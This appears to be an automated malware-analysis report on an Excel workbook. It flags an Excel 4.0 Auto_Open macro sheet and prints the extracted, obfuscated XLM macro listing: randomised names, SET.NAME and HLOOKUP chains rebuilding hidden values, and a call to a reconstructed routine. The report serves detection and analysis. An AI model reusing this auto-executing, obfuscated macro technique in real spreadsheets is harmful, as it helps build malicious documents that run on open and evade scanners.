MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6851 bytes |
SHA-256: b5d1aaa208ef0b4a6543e7094f968122dbeeaa4381f703415ae24b28144a13cd |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - QvQURaKowBL
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B193
' 0018 24 LABEL : Cell Value, String Constant - bLJSizSIq len=0
' 0018 20 LABEL : Cell Value, String Constant - CptDF len=0
' 0018 24 LABEL : Cell Value, String Constant - crFdwmIIW len=0
' 0018 25 LABEL : Cell Value, String Constant - CtsCBVkSaG len=0
' 0018 26 LABEL : Cell Value, String Constant - DRpRWJvngfh len=0
' 0018 23 LABEL : Cell Value, String Constant - EPSYWuwd len=0
' 0018 26 LABEL : Cell Value, String Constant - HxZxMefedIg len=0
' 0018 27 LABEL : Cell Value, String Constant - iLLqFSfBTgTa len=0
' 0018 24 LABEL : Cell Value, String Constant - IOZDSirhB len=0
' 0018 20 LABEL : Cell Value, String Constant - jmZlS len=0
' 0018 20 LABEL : Cell Value, String Constant - jTWyl len=0
' 0018 25 LABEL : Cell Value, String Constant - ljrBqcyhOy len=0
' 0018 20 LABEL : Cell Value, String Constant - LwfKA len=0
' 0018 21 LABEL : Cell Value, String Constant - mGyYuB len=0
' 0018 23 LABEL : Cell Value, String Constant - NBxcdVFR len=0
' 0018 27 LABEL : Cell Value, String Constant - pRULlACJymxL len=0
' 0018 24 LABEL : Cell Value, String Constant - tAybchnHW len=0
' 0018 25 LABEL : Cell Value, String Constant - TjJZLRYzFo len=0
' 0018 20 LABEL : Cell Value, String Constant - uVWyp len=0
' 0018 25 LABEL : Cell Value, String Constant - yAgLbvoIAk len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' QvQURaKowBL,S51,"",32.00000000000000000000
' QvQURaKowBL,S52,"",298.00000000000000000000
' QvQURaKowBL,S53,"",267.00000000000000000000
' QvQURaKowBL,S54,"",-905.00000000000000000000
' QvQURaKowBL,S55,"",-17.00000000000000000000
' QvQURaKowBL,S56,"",643.00000000000000000000
' QvQURaKowBL,B92,"SET.NAME("EPSYWuwd",0+VALUE("0"))",""
' QvQURaKowBL,B97,"SET.NAME("CptDF",EPSYWuwd)",""
' QvQURaKowBL,B100,"SET.NAME("IOZDSirhB",EPSYWuwd)",""
' QvQURaKowBL,B104,"SET.NAME("TjJZLRYzFo",COUNTA(uVWyp))",""
' QvQURaKowBL,B108,"SET.NAME("bLJSizSIq",COUNTA(ljrBqcyhOy))",""
' QvQURaKowBL,B113,[],""
' QvQURaKowBL,B116,"SET.NAME("crFdwmIIW","")",""
' QvQURaKowBL,B121,"CptDF",""
' QvQURaKowBL,B126,"SET.NAME("pRULlACJymxL",HLOOKUP("*",uVWyp,CptDF,FALSE))",""
' QvQURaKowBL,B130,"yAgLbvoIAk",""
' QvQURaKowBL,B132,"SET.NAME("NBxcdVFR",EPSYWuwd)",""
' QvQURaKowBL,B135,[],""
' QvQURaKowBL,B137,"NBxcdVFR",""
' QvQURaKowBL,B140,"CtsCBVkSaG",""
' QvQURaKowBL,B145,"tAybchnHW",""
' QvQURaKowBL,B149,"jTWyl",""
' QvQURaKowBL,B154,"SET.NAME("LwfKA",VALUE(HLOOKUP("*",ljrBqcyhOy,jTWyl,FALSE)))",""
' QvQURaKowBL,B158,"DRpRWJvngfh",""
' QvQURaKowBL,B163,"crFdwmIIW",""
' QvQURaKowBL,B166,"IOZDSirhB",""
' QvQURaKowBL,B171,NEXT(),""
' QvQURaKowBL,B174,"iLLqFSfBTgTa",""
' QvQURaKowBL,B176,[],""
' QvQURaKowBL,B181,"mGyYuB",""
' QvQURaKowBL,B186,NEXT(),""
' QvQURaKowBL,B188,RETURN(),""
' QvQURaKowBL,B217,"SET.NAME("jmZlS",B92)",""
' QvQURaKowBL,B220,"uVWyp",""
' QvQURaKowBL,B225,"SET.NAME("ljrBqcyhOy",R80C15)",""
' QvQURaKowBL,B229,"SET.NAME("mGyYuB",237)",""
' QvQURaKowBL,B232,"SET.NAME("HxZxMefedIg",2)",""
' QvQURaKowBL,B236,jmZlS(),""
' QvQURaKowBL,B237,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.